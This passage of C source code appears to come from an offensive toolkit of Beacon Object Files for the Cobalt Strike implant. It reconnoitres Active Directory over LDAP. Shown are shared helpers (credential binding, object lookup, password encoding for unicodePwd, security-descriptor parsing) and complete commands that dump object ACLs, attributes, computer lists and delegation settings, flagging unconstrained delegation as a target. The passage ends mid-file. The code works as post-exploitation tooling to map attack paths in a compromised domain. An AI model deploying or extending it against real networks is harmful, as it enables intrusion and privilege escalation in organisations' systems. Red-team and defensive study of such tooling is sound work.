        if (result != LDAP_SUCCESS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Warning: Failed to enable LDAP encryption: %lu", result);
        }
    }

    // Bind using current credentials (NEGOTIATE)
    result = WLDAP32$ldap_bind_s(pLdapConnection, NULL, NULL, LDAP_AUTH_NEGOTIATE);

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to bind to LDAP");
        PrintLdapError("Bind", result);
        WLDAP32$ldap_unbind_s(pLdapConnection);
        if (discoveredDC) MSVCRT$free(discoveredDC);
        return NULL;
    }

    // Free discovered DC hostname if we allocated it
    if (discoveredDC) {
        MSVCRT$free(discoveredDC);
    }

    return pLdapConnection;
}

// Get default naming context from rootDSE
char* GetDefaultNamingContext(LDAP* ld, const char* dcHostname) {
    if (!ld) return NULL;

    // Try to build from DC hostname first (faster, no network query)
    if (dcHostname && MSVCRT$strlen(dcHostname) > 0) {
        char* defaultNC = BuildDefaultNamingContextFromDC(dcHostname);
        if (defaultNC) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Default naming context: %s", defaultNC);
            return defaultNC;
        }
        // If building failed, fall through to query method
    }

    // Fallback: Query rootDSE (original implementation)
    LDAPMessage* searchResult = NULL;
    LDAPMessage* entry = NULL;
    char* attrs[] = { "defaultNamingContext", NULL };
    char** values = NULL;
    char* defaultNC = NULL;

    ULONG result = WLDAP32$ldap_search_s(
        ld,
        "",                         // Empty base DN for rootDSE
        LDAP_SCOPE_BASE,           // Base scope
        "(objectClass=*)",         // Match everything
        attrs,                     // Attributes
        0,                         // Return attributes and values
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to query rootDSE");
        return NULL;
    }

    entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (!entry) {
        WLDAP32$ldap_msgfree(searchResult);
        return NULL;
    }

    values = WLDAP32$ldap_get_values(ld, entry, "defaultNamingContext");
    if (values && values[0]) {
        size_t len = MSVCRT$strlen(values[0]) + 1;
        defaultNC = (char*)MSVCRT$malloc(len);
        if (defaultNC) {
            MSVCRT$strcpy(defaultNC, values[0]);
        }
        WLDAP32$ldap_value_free(values);
    }

    WLDAP32$ldap_msgfree(searchResult);
    return defaultNC;
}

// Find object DN by sAMAccountName
char* FindObjectDN(LDAP* ld, const char* samAccountName, const char* searchBase) {
    if (!ld || !samAccountName) return NULL;

    LDAPMessage* searchResult = NULL;
    LDAPMessage* entry = NULL;
    char filter[512];
    char* attrs[] = { "distinguishedName", NULL };
    char** values = NULL;
    char* objectDN = NULL;

    // Build search filter
    MSVCRT$_snprintf(filter, sizeof(filter), "(sAMAccountName=%s)", samAccountName);

    // Search for the object
    ULONG result = WLDAP32$ldap_search_s(
        ld,
        (char*)searchBase,
        LDAP_SCOPE_SUBTREE,
        filter,
        attrs,
        0,
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to search for object '%s'", samAccountName);
        return NULL;
    }

    entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (!entry) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Object '%s' not found", samAccountName);
        WLDAP32$ldap_msgfree(searchResult);
        return NULL;
    }

    values = WLDAP32$ldap_get_values(ld, entry, "distinguishedName");
    if (values && values[0]) {
        size_t len = MSVCRT$strlen(values[0]) + 1;
        objectDN = (char*)MSVCRT$malloc(len);
        if (objectDN) {
            MSVCRT$strcpy(objectDN, values[0]);
        }
        WLDAP32$ldap_value_free(values);
    }

    WLDAP32$ldap_msgfree(searchResult);
    return objectDN;
}

// Print LDAP error with context
void PrintLdapError(const char* context, ULONG ldapError) {
    char* errorMsg = WLDAP32$ldap_err2stringA(ldapError);
    if (errorMsg) {
        BeaconPrintf(CALLBACK_ERROR, "[-] %s - LDAP Error (0x%x): %s", context, ldapError, errorMsg);
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] %s - LDAP Error: 0x%x", context, ldapError);
    }
}

// Encode password for unicodePwd attribute (UTF-16LE with quotes)
BERVAL* EncodePassword(const char* password) {
    if (!password || MSVCRT$strlen(password) == 0) return NULL;

    // Create quoted password string
    size_t passLen = MSVCRT$strlen(password);
    char* quotedPass = (char*)MSVCRT$malloc(passLen + 3);
    if (!quotedPass) return NULL;

    quotedPass[0] = '"';
    MSVCRT$memcpy(quotedPass + 1, password, passLen);
    quotedPass[passLen + 1] = '"';
    quotedPass[passLen + 2] = '\0';

    // Convert to UTF-16LE
    int wideLen = KERNEL32$MultiByteToWideChar(CP_UTF8, 0, quotedPass, -1, NULL, 0);
    if (wideLen == 0) {
        MSVCRT$free(quotedPass);
        return NULL;
    }

    wchar_t* widePass = (wchar_t*)MSVCRT$malloc(wideLen * sizeof(wchar_t));
    if (!widePass) {
        MSVCRT$free(quotedPass);
        return NULL;
    }

    KERNEL32$MultiByteToWideChar(CP_UTF8, 0, quotedPass, -1, widePass, wideLen);
    MSVCRT$free(quotedPass);

    // Create BERVAL
    BERVAL* berval = (BERVAL*)MSVCRT$malloc(sizeof(BERVAL));
    if (!berval) {
        MSVCRT$free(widePass);
        return NULL;
    }

    berval->bv_len = (wideLen - 1) * sizeof(wchar_t); // Exclude null terminator
    berval->bv_val = (char*)widePass;

    return berval;
}

// Cleanup LDAP connection
void CleanupLDAP(LDAP* ld) {
    if (ld) {
        WLDAP32$ldap_unbind_s(ld);
    }
}

// Build SD_FLAGS control for security descriptor queries
// Returns pointer to LDAPControlA structure, or NULL on error
// Caller must provide buffer (at least 10 bytes) and berval storage
LDAPControlA* BuildSDFlagsControl(DWORD sdFlags, char* buffer, struct berval* bervalStorage) {
    if (!buffer || !bervalStorage) return NULL;

    static LDAPControlA sdFlagsControl;
    int bufferPos = 0;

    // BER-encode the SD_FLAGS value
    // SEQUENCE tag
    buffer[bufferPos++] = 0x30;
    int seqLenPos = bufferPos++;

    // INTEGER tag
    buffer[bufferPos++] = 0x02;
    // INTEGER length = 1 byte
    buffer[bufferPos++] = 0x01;
    // INTEGER value (only using low byte for flags)
    buffer[bufferPos++] = (char)(sdFlags & 0xFF);

    // Set SEQUENCE length
    buffer[seqLenPos] = (char)(bufferPos - seqLenPos - 1);

    bervalStorage->bv_len = bufferPos;
    bervalStorage->bv_val = buffer;

    sdFlagsControl.ldctl_oid = LDAP_SERVER_SD_FLAGS_OID;
    sdFlagsControl.ldctl_value = *bervalStorage;
    sdFlagsControl.ldctl_iscritical = TRUE;

    return &sdFlagsControl;
}

// Convert binary GUID to string format
void FormatGUID(BYTE* guidBytes, char* output) {
    MSVCRT$sprintf(output, "%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x",
        guidBytes[3], guidBytes[2], guidBytes[1], guidBytes[0],
        guidBytes[5], guidBytes[4],
        guidBytes[7], guidBytes[6],
        guidBytes[8], guidBytes[9],
        guidBytes[10], guidBytes[11], guidBytes[12], guidBytes[13], guidBytes[14], guidBytes[15]);
}

// Convert binary SID to string format (simplified - handles common SIDs)
void FormatSID(BYTE* sidBytes, int length, char* output) {
    if (length < 8) {
        MSVCRT$sprintf(output, "(invalid SID)");
        return;
    }

    BYTE revision = sidBytes[0];
    BYTE subAuthCount = sidBytes[1];

    // Authority (6 bytes, big-endian)
    unsigned long long authority = 0;
    for (int i = 0; i < 6; i++) {
        authority = (authority << 8) | sidBytes[2 + i];
    }

    // Start building the SID string
    int pos = MSVCRT$sprintf(output, "S-%d-%llu", revision, authority);

    // SubAuthorities (32-bit values, little-endian)
    for (int i = 0; i < subAuthCount && (8 + i * 4 + 3) < length; i++) {
        unsigned long subAuth =
            (unsigned long)sidBytes[8 + i * 4] |
            ((unsigned long)sidBytes[8 + i * 4 + 1] << 8) |
            ((unsigned long)sidBytes[8 + i * 4 + 2] << 16) |
            ((unsigned long)sidBytes[8 + i * 4 + 3] << 24);
        pos += MSVCRT$sprintf(output + pos, "-%lu", subAuth);
    }
}

// Build attribute list from comma-separated string
// Returns number of attributes in the array
int BuildAttributeList(char* attributesStr, char** defaultAttrs, int defaultCount, char** attrs, int maxAttrs) {
    int attrCount = 0;

    // Always include sAMAccountName
    attrs[attrCount++] = "sAMAccountName";

    // If attributes specified, parse comma-separated list
    if (attributesStr && MSVCRT$strlen(attributesStr) > 0) {
        char* token = MSVCRT$strtok(attributesStr, ",");
        while (token != NULL && attrCount < (maxAttrs - 1)) {
            // Trim leading spaces
            while (*token == ' ') token++;
            // Skip if it's sAMAccountName (already added)
            if (MSVCRT$_stricmp(token, "sAMAccountName") != 0) {
                attrs[attrCount++] = token;
            }
            token = MSVCRT$strtok(NULL, ",");
        }
    } else if (defaultAttrs) {
        // Add default attributes if provided and no custom attributes
        for (int i = 0; i < defaultCount && attrCount < (maxAttrs - 1); i++) {
            attrs[attrCount++] = defaultAttrs[i];
        }
    }

    attrs[attrCount] = NULL;
    return attrCount;
}

// Display attribute value (handles both string and binary attributes)
void DisplayAttributeValue(LDAP* ld, LDAPMessage* entry, const char* attrName) {
    // Check if this is a known binary attribute (case-insensitive)
    BOOL isBinary = (MSVCRT$_stricmp(attrName, "objectGUID") == 0 ||
                    MSVCRT$_stricmp(attrName, "objectSid") == 0 ||
                    MSVCRT$_stricmp(attrName, "ntSecurityDescriptor") == 0);

    if (isBinary) {
        // Handle binary attributes
        struct berval** bvalues = WLDAP32$ldap_get_values_len(ld, entry, (char*)attrName);
        if (bvalues && bvalues[0]) {
            for (int j = 0; bvalues[j] != NULL; j++) {
                char formatted[256];
                if (MSVCRT$_stricmp(attrName, "objectGUID") == 0) {
                    FormatGUID((BYTE*)bvalues[j]->bv_val, formatted);
                    BeaconPrintf(CALLBACK_OUTPUT, "%s: %s", attrName, formatted);
                } else if (MSVCRT$_stricmp(attrName, "objectSid") == 0 ||
                           MSVCRT$_stricmp(attrName, "objectSID") == 0) {
                    FormatSID((BYTE*)bvalues[j]->bv_val, bvalues[j]->bv_len, formatted);
                    BeaconPrintf(CALLBACK_OUTPUT, "%s: %s", attrName, formatted);
                } else if (MSVCRT$_stricmp(attrName, "ntSecurityDescriptor") == 0) {
                    // Convert binary security descriptor to SDDL string
                    LPSTR sddlString = NULL;
                    ULONG sddlLen = 0;

                    // Convert to SDDL format (Owner, Group, DACL, SACL)
                    if (ADVAPI32$ConvertSecurityDescriptorToStringSecurityDescriptorA(
                            (PSECURITY_DESCRIPTOR)bvalues[j]->bv_val,
                            1,  // SDDL_REVISION_1
                            OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION |
                            DACL_SECURITY_INFORMATION | SACL_SECURITY_INFORMATION,
                            &sddlString,
                            &sddlLen)) {
                        BeaconPrintf(CALLBACK_OUTPUT, "%s: %s", attrName, sddlString);
                        KERNEL32$LocalFree(sddlString);
                    } else {
                        // Fallback to hex display if SDDL conversion fails
                        int displayLen = bvalues[j]->bv_len < 32 ? bvalues[j]->bv_len : 32;
                        char hexStr[256] = {0};
                        int pos = 0;
                        for (int k = 0; k < displayLen && pos < sizeof(hexStr) - 3; k++) {
                            pos += MSVCRT$_snprintf(hexStr + pos, sizeof(hexStr) - pos, "%02x", (BYTE)bvalues[j]->bv_val[k]);
                        }
                        if (bvalues[j]->bv_len > displayLen) {
                            MSVCRT$_snprintf(hexStr + pos, sizeof(hexStr) - pos, "... (%d bytes total)", bvalues[j]->bv_len);
                        }
                        BeaconPrintf(CALLBACK_OUTPUT, "%s: %s", attrName, hexStr);
                    }
                }
            }
            WLDAP32$ldap_value_free_len(bvalues);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "%s: <not found>", attrName);
        }
    } else {
        // Handle string attributes
        char** values = WLDAP32$ldap_get_values(ld, entry, (char*)attrName);
        if (values && values[0]) {
            BeaconPrintf(CALLBACK_OUTPUT, "%s: %s", attrName, values[0]);
            // Print additional values if multi-valued
            for (int j = 1; values[j] != NULL; j++) {
                BeaconPrintf(CALLBACK_OUTPUT, "%s: %s", attrName, values[j]);
            }
            WLDAP32$ldap_value_free(values);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "%s: <not found>", attrName);
        }
    }
}

================================================
FILE: AD-BOF/LDAP-BOF/src/get/get-acl.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"
#include "acl_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: object_identifier, is_dn, search_ou, dc_address, use_ldaps, resolve_names
    char* objectIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isObjectDN = BeaconDataInt(&parser);
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    int resolveNames = BeaconDataInt(&parser);

    if (!objectIdentifier || MSVCRT$strlen(objectIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Object identifier is required");
        return;
    }

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (!defaultNC) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    // Resolve target DN
    char* targetDN = NULL;
    if (isObjectDN) {
        size_t len = MSVCRT$strlen(objectIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) {
            MSVCRT$strcpy(targetDN, objectIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, objectIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", objectIdentifier);
            MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Read security descriptor
    BERVAL* sdBerval = ReadSecurityDescriptor(ld, targetDN);
    if (!sdBerval) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to read security descriptor");
        goto cleanup;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Read security descriptor (%d bytes)", sdBerval->bv_len);

    // Get object SID for display
    PSID pObjectSid = GetObjectSid(ld, targetDN);
    char* objectSidStr = NULL;
    if (pObjectSid) {
        objectSidStr = SidToString(pObjectSid);
    }

    // Parse security descriptor
    PSD_INFO sdInfo = ParseSecurityDescriptor((BYTE*)sdBerval->bv_val, sdBerval->bv_len);
    if (!sdInfo) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to parse security descriptor");
        if (objectSidStr) MSVCRT$free(objectSidStr);
        if (pObjectSid) MSVCRT$free(pObjectSid);
        MSVCRT$free(sdBerval->bv_val);
        MSVCRT$free(sdBerval);
        goto cleanup;
    }

    // Resolve SID names if requested
    if (resolveNames) {
        if (sdInfo->OwnerSid) {
            sdInfo->OwnerName = ResolveSidToName(ld, sdInfo->OwnerSid, defaultNC);
        }
        if (sdInfo->GroupSid) {
            sdInfo->GroupName = ResolveSidToName(ld, sdInfo->GroupSid, defaultNC);
        }
        if (sdInfo->DaclAces) {
            for (DWORD i = 0; i < sdInfo->DaclAceCount; i++) {
                if (sdInfo->DaclAces[i].TrusteeSid) {
                    sdInfo->DaclAces[i].TrusteeName = ResolveSidToName(ld, sdInfo->DaclAces[i].TrusteeSid, defaultNC);
                }
            }
        }
    }

    // Display security descriptor
    PrintSecurityDescriptorInfo(sdInfo, targetDN, objectSidStr);

    // Cleanup
    FreeSecurityDescriptorInfo(sdInfo);
    if (objectSidStr) MSVCRT$free(objectSidStr);
    if (pObjectSid) MSVCRT$free(pObjectSid);
    MSVCRT$free(sdBerval->bv_val);
    MSVCRT$free(sdBerval);

cleanup:
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    if (targetDN) MSVCRT$free(targetDN);
    CleanupLDAP(ld);
}

================================================
FILE: AD-BOF/LDAP-BOF/src/get/get-attribute.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: target_identifier, is_dn, attributes (comma-separated), search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* attributesStr = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    if (!attributesStr || MSVCRT$strlen(attributesStr) == 0) {
        return;
    }

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = NULL;
    if (!isTargetDN) {
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Resolve target DN
    char* targetDN = NULL;
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) {
            MSVCRT$strcpy(targetDN, targetIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Build attribute list
    char* attrs[64];
    int attrCount = BuildAttributeList(attributesStr, NULL, 0, attrs, 64);

    // Check if ntSecurityDescriptor is requested (case-insensitive)
    BOOL needSDFlags = FALSE;
    for (int i = 0; i < attrCount; i++) {
        if (MSVCRT$_stricmp(attrs[i], "ntSecurityDescriptor") == 0) {
            needSDFlags = TRUE;
            break;
        }
    }

    // Query the attributes
    LDAPMessage* searchResult = NULL;
    ULONG result;

    if (needSDFlags) {
        // Create SD_FLAGS control for ntSecurityDescriptor
        DWORD sdFlags = OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION;

        char sdFlagsBuffer[10];
        struct berval sdFlagsValue;
        LDAPControlA* sdFlagsControl = BuildSDFlagsControl(sdFlags, sdFlagsBuffer, &sdFlagsValue);

        LDAPControlA* serverControls[] = { sdFlagsControl, NULL };

        result = WLDAP32$ldap_search_ext_s(
            ld,
            targetDN,
            LDAP_SCOPE_BASE,
            "(objectClass=*)",
            attrs,
            0,
            serverControls,
            NULL,           // ClientControls
            NULL,           // timeout
            0,              // SizeLimit
            &searchResult
        );
    } else {
        result = WLDAP32$ldap_search_s(
            ld,
            targetDN,
            LDAP_SCOPE_BASE,
            "(objectClass=*)",
            attrs,
            0,
            &searchResult
        );
    }

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to query attributes");
        PrintLdapError("Query attributes", result);
        MSVCRT$free(targetDN);
        if (defaultNC) MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    LDAPMessage* entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (entry) {
        BeaconPrintf(CALLBACK_OUTPUT, "==========================================");

        // Display all requested attributes
        for (int i = 0; i < attrCount; i++) {
            DisplayAttributeValue(ld, entry, attrs[i]);
        }
    }

    WLDAP32$ldap_msgfree(searchResult);
    MSVCRT$free(targetDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}

================================================
FILE: AD-BOF/LDAP-BOF/src/get/get-computers.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: search_ou, dc_address, use_ldaps, attributes
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    char* attributesStr = ValidateInput(BeaconDataExtract(&parser, NULL));

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (!defaultNC) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;

    // Build attribute list
    char* attrs[64];
    char* defaultAttrs[] = { "distinguishedName", "operatingSystem" };
    int attrCount = BuildAttributeList(attributesStr, defaultAttrs, 2, attrs, 64);

    // Check if ntSecurityDescriptor is requested (case-insensitive)
    BOOL needSDFlags = FALSE;
    for (int i = 0; i < attrCount; i++) {
        if (MSVCRT$_stricmp(attrs[i], "ntSecurityDescriptor") == 0) {
            needSDFlags = TRUE;
            break;
        }
    }

    // Search for computer objects
    LDAPMessage* searchResult = NULL;
    ULONG result;

    if (needSDFlags) {
        // Create SD_FLAGS control for ntSecurityDescriptor
        DWORD sdFlags = OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION;

        char sdFlagsBuffer[10];
        struct berval sdFlagsValue;
        LDAPControlA* sdFlagsControl = BuildSDFlagsControl(sdFlags, sdFlagsBuffer, &sdFlagsValue);

        LDAPControlA* serverControls[] = { sdFlagsControl, NULL };

        result = WLDAP32$ldap_search_ext_s(
            ld,
            searchBase,
            LDAP_SCOPE_SUBTREE,
            "(objectClass=computer)",
            attrs,
            0,
            serverControls,
            NULL,           // ClientControls
            NULL,           // timeout
            0,              // SizeLimit
            &searchResult
        );
    } else {
        result = WLDAP32$ldap_search_s(
            ld,
            searchBase,
            LDAP_SCOPE_SUBTREE,
            "(objectClass=computer)",
            attrs,
            0,
            &searchResult
        );
    }

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to search for computers");
        PrintLdapError("Search computers", result);
        MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    int compCount = WLDAP32$ldap_count_entries(ld, searchResult);
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Found %d computer(s):\n", compCount);

    LDAPMessage* entry = WLDAP32$ldap_first_entry(ld, searchResult);
    while (entry != NULL) {
        BeaconPrintf(CALLBACK_OUTPUT, "===================================");

        // Display all requested attributes
        for (int i = 0; i < attrCount; i++) {
            DisplayAttributeValue(ld, entry, attrs[i]);
        }

        entry = WLDAP32$ldap_next_entry(ld, entry);
    }

    WLDAP32$ldap_msgfree(searchResult);
    MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}

================================================
FILE: AD-BOF/LDAP-BOF/src/get/get-delegation.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

DECLSPEC_IMPORT long __cdecl MSVCRT$strtol(const char* str, char** endptr, int base);

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: target_identifier, is_dn, search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target identifier is required");
        return;
    }

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = NULL;
    if (!isTargetDN) {
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Resolve target DN
    char* targetDN = NULL;
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) {
            MSVCRT$strcpy(targetDN, targetIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Target '%s' not found", targetIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Query delegation attributes
    LDAPMessage* searchResult = NULL;
    char* attrs[] = { "msDS-AllowedToDelegateTo", "userAccountControl", NULL };

    ULONG result = WLDAP32$ldap_search_s(
        ld,
        targetDN,
        LDAP_SCOPE_BASE,
        "(objectClass=*)",
        attrs,
        0,
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to query delegation");
        PrintLdapError("Query delegation", result);
        MSVCRT$free(targetDN);
        if (defaultNC) MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    LDAPMessage* entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (entry) {
        BeaconPrintf(CALLBACK_OUTPUT, "\n[+] Delegation Configuration:");
        BeaconPrintf(CALLBACK_OUTPUT, "==============================");

        // Check UAC for delegation flags
        char** uacValues = WLDAP32$ldap_get_values(ld, entry, "userAccountControl");
        if (uacValues && uacValues[0]) {
            DWORD uac = (DWORD)MSVCRT$strtol(uacValues[0], NULL, 10);
            BeaconPrintf(CALLBACK_OUTPUT, "\n[*] UAC Delegation Flags:");

            if (uac & UF_TRUSTED_FOR_DELEGATION) {
                BeaconPrintf(CALLBACK_OUTPUT, "    [!] TRUSTED_FOR_DELEGATION (Unconstrained delegation enabled)");
            }
            if (uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION) {
                BeaconPrintf(CALLBACK_OUTPUT, "    [!] TRUSTED_TO_AUTH_FOR_DELEGATION (Protocol transition enabled)");
            }
            if (uac & UF_NOT_DELEGATED) {
                BeaconPrintf(CALLBACK_OUTPUT, "    [*] NOT_DELEGATED (Account cannot be delegated)");
            }
            if (!(uac & (UF_TRUSTED_FOR_DELEGATION | UF_TRUSTED_TO_AUTH_FOR_DELEGATION | UF_NOT_DELEGATED))) {
                BeaconPrintf(CALLBACK_OUTPUT, "    [*] No delegation flags set");
            }
            WLDAP32$ldap_value_free(uacValues);
        }

        // Get constrained delegation SPNs
        char** delegateValues = WLDAP32$ldap_get_values(ld, entry, "msDS-AllowedToDelegateTo");
        if (delegateValues) {
            int spnCount = WLDAP32$ldap_count_values(delegateValues);
            BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Constrained Delegation SPNs (%d):", spnCount);
            for (int i = 0; delegateValues[i] != NULL; i++) {
                BeaconPrintf(CALLBACK_OUTPUT, "    %s", delegateValues[i]);
            }
            WLDAP32$ldap_value_free(delegateValues);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "\n[*] No constrained delegation SPNs configured");
        }
    }

    WLDAP32$ldap_msgfree(searchResult);
    MSVCRT$free(targetDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
}


================================================
FILE: AD-BOF/LDAP-BOF/src/get/get-domaininfo.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

    // Parse arguments: dc_address, use_ldaps
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Query rootDSE for domain info
    LDAPMessage* searchResult = NULL;
    char* attrs[] = {
        "defaultNamingContext",
        "rootDomainNamingContext",
        "configurationNamingContext",
        "schemaNamingContext",
        "dnsHostName",
        "serverName",
        "ldapServiceName",
        "forestFunctionality",
